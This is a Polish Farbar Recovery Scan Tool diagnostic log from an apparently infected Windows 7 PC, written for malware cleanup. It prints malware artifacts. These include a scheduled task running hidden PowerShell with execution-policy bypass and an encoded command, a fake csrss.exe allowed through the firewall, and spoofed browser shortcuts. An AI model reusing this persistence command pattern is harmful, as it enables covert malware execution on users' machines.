Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 20-08-2017 Uruchomiony przez Tomek (04-09-2017 19:40:33) Uruchomiony z C:\Users\Tomek\Downloads Windows 7 Professional Service Pack 1 (X64) (2017-02-08 14:08:14) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-4185380531-2055773481-192677435-500 - Administrator - Disabled) Gość (S-1-5-21-4185380531-2055773481-192677435-501 - Limited - Disabled) Tomek (S-1-5-21-4185380531-2055773481-192677435-1000 - Administrator - Enabled) => C:\Users\Tomek ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-4185380531-2055773481-192677435-1000\...\uTorrent) (Version: 3.5.0.43916 - BitTorrent Inc.) Adobe Flash Player 26 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 26.0.0.151 - Adobe Systems Incorporated) DiRT Rally (HKLM\...\ZGlydHJhbGx5_is1) (Version: 1 - ) Ford Racing 3 (HKLM\...\Steam App 315600) (Version: - Razorworks) Ford Street Racing (HKLM\...\Steam App 306520) (Version: - Razorworks) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.113 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden Grand Theft Auto: San Andreas (HKLM\...\Steam App 12120) (Version: - Rockstar Games) Icy Tower v1.5.1 (HKLM-x32\...\Icy Tower v1.5.1_is1) (Version: - Free Lunch Design) Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) Mafia (HKLM-x32\...\Mafia) (Version: - ) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation) MoTeC M1 Tune 1.4 (HKLM-x32\...\{36CE56F1-CD72-441D-848F-4F53963A1377}) (Version: 7.00.7727 - MoTeC) Mozilla Firefox 54.0.1 (x64 pl) (HKLM\...\Mozilla Firefox 54.0.1 (x64 pl)) (Version: 54.0.1 - Mozilla) Need For Speed Underground (HKLM-x32\...\{A99968BE-C155-474C-0089-33239DEE1CE2}) (Version: - ) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.3 - NVIDIA Corporation) NVIDIA ForceWare Network Access Manager (HKLM-x32\...\InstallShield_{7CFA46E3-CC2F-4355-82AE-6012DC3633FD}) (Version: - ) NVIDIA Sterownik 3D Vision 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 320.49 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.24.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.24.2 - NVIDIA Corporation) NVIDIA Sterownik graficzny 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 320.49 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 320.49 - NVIDIA Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Panel sterowania NVIDIA 320.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 320.49 - NVIDIA Corporation) Hidden SafeFinder (HKLM-x32\...\{01B19AE2-AD54-4656-850C-44B74C1B7534}) (Version: 1.0.0.0 - Linkury) <==== UWAGA Samsung ML-2010 Series (HKLM-x32\...\Samsung ML-2010 Series) (Version: - ) TP-LINK TL-WN881ND Driver (HKLM-x32\...\{FDA7E907-6539-42C1-9721-0239C281B336}) (Version: 1.3.1 - TP-LINK) Warblade (HKLM-x32\...\Warblade_is1) (Version: - EMV Software) WinRAR 5.40 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2013-06-21] (NVIDIA Corporation) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-09-19] (Alexander Roshal) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {498998F3-8859-449C-8509-6F6FD5BEF3BB} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_26_0_0_151_pepper.exe [2017-08-26] (Adobe Systems Incorporated) Task: {599E82B8-D789-4F16-9A12-C9F92DA9C484} - System32\Tasks\{513EE0BA-408A-448F-99C3-2E2385119AC4} => C:\Windows\system32\pcalua.exe -a D:\d\call\1\Mafia\mafia.exe -d D:\d\call\1\Mafia Task: {629A09E5-E9C2-4B12-89A1-3CAB51C689BC} - System32\Tasks\{6DBBCAF7-ED92-427B-A744-3831A426ABC7} => C:\Windows\system32\pcalua.exe -a "C:\Users\Tomek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall Task: {7AA882E6-8FA6-4779-9BC1-57ABAF5114AB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-08] (Google Inc.) Task: {80CD9417-A491-4EDF-9742-E12954077206} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2017-09-03] () <==== UWAGA Task: {82A1BDE8-14A0-4AC2-891F-F70E7B32D614} - System32\Tasks\{0E790D47-0E09-0A04-7E11-087F7E7F117A} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwAgACAAIAA7ACAAOwA7ADsAOwAgADsAOwAgACAAOwA7ACAAIAAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQA (dane wartości zawierają 9968 znaków więcej). <==== UWAGA Task: {E99535D1-00DB-451E-A2AF-3844409D7F4D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-08] (Google Inc.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr (64-bit).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) <==== Cyrillic Shortcut: C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) <==== Cyrillic Shortcut: C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlоrеr (Nо Аdd-оns).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) <==== Cyrillic Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооglе Сhrоmе.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) <==== Cyrillic Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) <==== Cyrillic Shortcut: C:\Users\Public\Desktop\Gооglе Сhrоmе.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) <==== Cyrillic Shortcut: C:\Users\Public\Desktop\Моzillа Firеfох.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) <==== Cyrillic ==================== Załadowane moduły (filtrowane) ============== 2017-02-08 16:27 - 2013-06-21 12:23 - 000087328 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2017-05-11 06:58 - 2006-12-04 01:26 - 000022016 _____ () C:\Windows\System32\SUGS2l6.dll 2017-09-03 12:57 - 2017-09-03 12:57 - 000406208 _____ () C:\ProgramData\clsid45053.exe 2017-06-12 10:34 - 2017-06-12 10:34 - 000075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2017-09-03 12:57 - 2017-09-03 12:57 - 000177152 _____ () C:\Windows\svchost.exe 2009-04-19 09:34 - 2009-04-19 09:34 - 000625184 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe 2009-04-19 09:34 - 2009-04-19 09:34 - 000070176 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nv_common.dll 2009-04-19 09:34 - 2009-04-19 09:34 - 000578080 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\SpecialCase.dll 2009-04-19 09:34 - 2009-04-19 09:34 - 000207904 _____ () C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe 2016-11-27 21:39 - 2017-08-04 23:19 - 000678176 _____ () D:\steam\SDL2.dll 2016-11-27 21:39 - 2016-09-01 03:02 - 004969248 _____ () D:\steam\v8.dll 2016-11-27 21:39 - 2016-09-01 03:02 - 001563936 _____ () D:\steam\icui18n.dll 2016-11-27 21:39 - 2016-09-01 03:02 - 001195296 _____ () D:\steam\icuuc.dll 2016-11-27 21:39 - 2017-08-28 22:05 - 002505504 _____ () D:\steam\video.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 002549760 _____ () D:\steam\libavcodec-56.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 000442880 _____ () D:\steam\libavutil-54.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 000491008 _____ () D:\steam\libavformat-56.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 000332800 _____ () D:\steam\libavresample-2.dll 2016-11-27 21:39 - 2016-01-27 09:49 - 000485888 _____ () D:\steam\libswscale-3.dll 2016-11-27 21:39 - 2017-08-28 22:05 - 000885024 _____ () D:\steam\bin\chromehtml.DLL 2016-11-27 21:39 - 2016-07-05 00:17 - 000266560 _____ () D:\steam\openvr_api.dll 2016-12-30 17:06 - 2017-07-18 00:50 - 073115424 _____ () D:\steam\bin\cef\cef.win7\libcef.dll 2017-06-08 23:00 - 2017-05-17 03:54 - 000678176 _____ () D:\steam\bin\cef\cef.win7\SDL2.dll 2016-11-27 21:39 - 2015-09-25 01:52 - 000119208 _____ () D:\steam\winh264.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2017-09-03 12:57 - 000001293 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 cpm.paneladmin.pro 127.0.0.1 publisher.hmdiadmingate.xyz 127.0.0.1 distribution.hmdiadmingate.xyz 127.0.0.1 hmdicrewtracksystem.xyz 127.0.0.1 linkmate.space 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 doctorlink.space 127.0.0.1 plugpackdownload.net 127.0.0.1 texttotalk.org 127.0.0.1 gambling577.xyz 127.0.0.1 htagdownload.space 127.0.0.1 mybcnmonetize.com 127.0.0.1 360devtraking.website 127.0.0.1 dscdn.pw 127.0.0.1 beautifllink.xyz ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-4185380531-2055773481-192677435-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Tomek\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{5F05122D-06F6-43F8-9C09-1C42D3FBCFA3}] => (Allow) D:\steam\Steam.exe FirewallRules: [{9CC28351-3F1B-4D44-8DE4-4F456FC88EE1}] => (Allow) D:\steam\Steam.exe FirewallRules: [{5D40C377-216D-43DA-A122-B1B9CE0E3243}] => (Allow) D:\steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{87C5DD9E-25A4-40D6-9AEA-D7ADA81497C0}] => (Allow) D:\steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [TCP Query User{05D5603C-8AF6-47EF-95A6-6CB290351AD8}D:\steam\steamapps\common\counter-strike global offensive\csgo.exe] => (Allow) D:\steam\steamapps\common\counter-strike global offensive\csgo.exe FirewallRules: [UDP Query User{9A9C4CE7-42E5-4B7B-8B99-7C4933694BBA}D:\steam\steamapps\common\counter-strike global offensive\csgo.exe] => (Allow) D:\steam\steamapps\common\counter-strike global offensive\csgo.exe FirewallRules: [{5781CCCB-E54F-479B-8BD8-4998DB4CDCCE}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{1BC40D81-AD21-40DA-88E8-2D86B7CB9A3D}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{305D4CD7-592D-46E7-B5BC-5F3EBA385CAB}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{18023164-090E-4C3A-97D8-7BEB00B0F803}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{4CFDB65E-F283-4006-89F9-DA5DF44AC218}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{4A816AA0-8B40-485C-A6AD-1C04D4DC152C}] => (Allow) C:\Users\Tomek\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [TCP Query User{EAD949E8-87FF-401A-9680-3DC07B20F241}D:\gry\cod\call of duty modern warfare\iw3mp.exe] => (Allow) D:\gry\cod\call of duty modern warfare\iw3mp.exe FirewallRules: [UDP Query User{A05408F5-DEF6-48D2-9697-8B7E897367F7}D:\gry\cod\call of duty modern warfare\iw3mp.exe] => (Allow) D:\gry\cod\call of duty modern warfare\iw3mp.exe FirewallRules: [TCP Query User{C7B3F808-81C2-4E68-895A-3719AD3BDC1D}D:\steam\steamapps\common\half-life\hl.exe] => (Allow) D:\steam\steamapps\common\half-life\hl.exe FirewallRules: [UDP Query User{95808FD6-D9B9-44AE-8B42-60E329E01E37}D:\steam\steamapps\common\half-life\hl.exe] => (Allow) D:\steam\steamapps\common\half-life\hl.exe FirewallRules: [{B82E4D46-1860-449D-9302-38C2C9DB0523}] => (Allow) D:\steam\steamapps\common\Grand Theft Auto San Andreas\gta-sa.exe FirewallRules: [{3A7C4FDD-4FC9-4F83-A0A7-320AA496CB39}] => (Allow) D:\steam\steamapps\common\Grand Theft Auto San Andreas\gta-sa.exe FirewallRules: [TCP Query User{81285A46-ABDD-435B-AB11-781B6BCA51E4}D:\gry\counter-strike clean edition\hl.exe] => (Allow) D:\gry\counter-strike clean edition\hl.exe FirewallRules: [UDP Query User{40D02124-EBE6-421E-9324-1B38D87BB913}D:\gry\counter-strike clean edition\hl.exe] => (Allow) D:\gry\counter-strike clean edition\hl.exe FirewallRules: [TCP Query User{4680EC59-D5C2-45D0-8A59-2C6F68BA06A8}D:\programy\motec\discovery\1.0\motec.discovery.exe] => (Allow) D:\programy\motec\discovery\1.0\motec.discovery.exe FirewallRules: [UDP Query User{1D753EEF-9D0C-4913-8A8C-54309F46E544}D:\programy\motec\discovery\1.0\motec.discovery.exe] => (Allow) D:\programy\motec\discovery\1.0\motec.discovery.exe FirewallRules: [{FABC06CD-CE86-4ED8-8836-263174264395}] => (Allow) D:\steam\steamapps\common\Ford Street Racing\fsr.exe FirewallRules: [{A682C782-5D9B-4338-B9FC-25E89E56819C}] => (Allow) D:\steam\steamapps\common\Ford Street Racing\fsr.exe FirewallRules: [{CBD28251-58BB-4831-82B5-F46FE2917141}] => (Allow) D:\steam\steamapps\common\Ford Racing 3\fr3.exe FirewallRules: [{A49B1AEE-8FE2-4C68-B713-72F17D453630}] => (Allow) D:\steam\steamapps\common\Ford Racing 3\fr3.exe FirewallRules: [{66A26559-B76D-4320-B5F8-4B3A28D25251}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{84CD8115-351B-4C5E-A9E6-B2DA9518F6CD}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{26D00ADF-5D93-48B8-9997-BD519F097CFC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{B0BC1F9E-BAF7-4746-AFEF-61AFCCA753A2}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{7BA01948-8F8D-4554-A0ED-C4B6EF74C54C}] => (Allow) C:\Users\Tomek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{6A21CB30-180E-4B2A-8CA9-CCD12B1464BA}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{AA0FEC1C-CC0B-4689-8A60-69D378A54C78}] => (Allow) C:\Users\Tomek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe ==================== Punkty Przywracania systemu ========================= 04-09-2017 19:14:44 Removed Online Application ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: wfcre Description: wfcre Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: wfcre Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (09/04/2017 07:36:39 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/04/2017 07:35:01 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Error: (09/04/2017 07:35:01 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Wystąpił błąd aktywacji licencji (slui.exe), kod błędu: 0x800401F9 Error: (09/04/2017 07:31:46 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/04/2017 07:30:09 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Error: (09/04/2017 07:30:09 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Wystąpił błąd aktywacji licencji (slui.exe), kod błędu: 0x800401F9 Error: (09/04/2017 07:14:52 PM) (Source: SideBySide) (EventID: 59) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe". Błąd w pliku manifestu lub w pliku zasad "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe.Config" w wierszu 0. Nieprawidłowa składnia XML. Error: (09/04/2017 07:14:35 PM) (Source: SideBySide) (EventID: 59) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe". Błąd w pliku manifestu lub w pliku zasad "C:\AdwCleaner\Quarantine\3soLBPh71Y\wermgr.exe.Config" w wierszu 0. Nieprawidłowa składnia XML. Error: (09/04/2017 07:10:45 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (09/04/2017 07:09:02 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Dziennik System: ============= Error: (09/04/2017 07:35:25 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: wfcre Error: (09/04/2017 07:35:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Windows Defender Helper Service (Windows 1703 Creators Update) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (09/04/2017 07:34:09 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (09/04/2017 07:30:19 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: wfcre Error: (09/04/2017 07:30:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Windows Defender Helper Service (Windows 1703 Creators Update) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (09/04/2017 07:09:15 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: wfcre Error: (09/04/2017 07:09:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Windows Defender Helper Service (Windows 1703 Creators Update) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (09/04/2017 07:05:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Ochrona oprogramowania niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 120000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (09/04/2017 07:05:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Windows Defender Helper Service (Windows 1703 Creators Update) niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (09/04/2017 07:05:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa ForceWare IP service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. CodeIntegrity: =================================== Date: 2017-09-04 19:34:57.925 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2017-09-04 19:30:40.145 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:30:40.114 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:30:08.605 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2017-09-04 19:10:03.374 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:10:03.265 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 19:08:58.268 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2017-09-04 19:00:44.984 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2017-09-04 18:53:35.981 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-09-04 18:53:35.950 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Statystyki pamięci =========================== Procesor: AMD Phenom(tm) II X3 720 Processor Procent pamięci w użyciu: 40% Całkowita pamięć fizyczna: 4095.24 MB Dostępna pamięć fizyczna: 2429.84 MB Całkowita pamięć wirtualna: 8188.68 MB Dostępna pamięć wirtualna: 6266.51 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:32.1 GB) (Free:9.04 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)] Drive d: (Nowy) (Fixed) (Total:116.82 GB) (Free:31.98 GB) NTFS Drive f: (MAFIA_CD_3) (CDROM) (Total:0.65 GB) (Free:0 GB) CDFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 148.9 GB) (Disk ID: CFEFCFEF) Partition 1: (Active) - 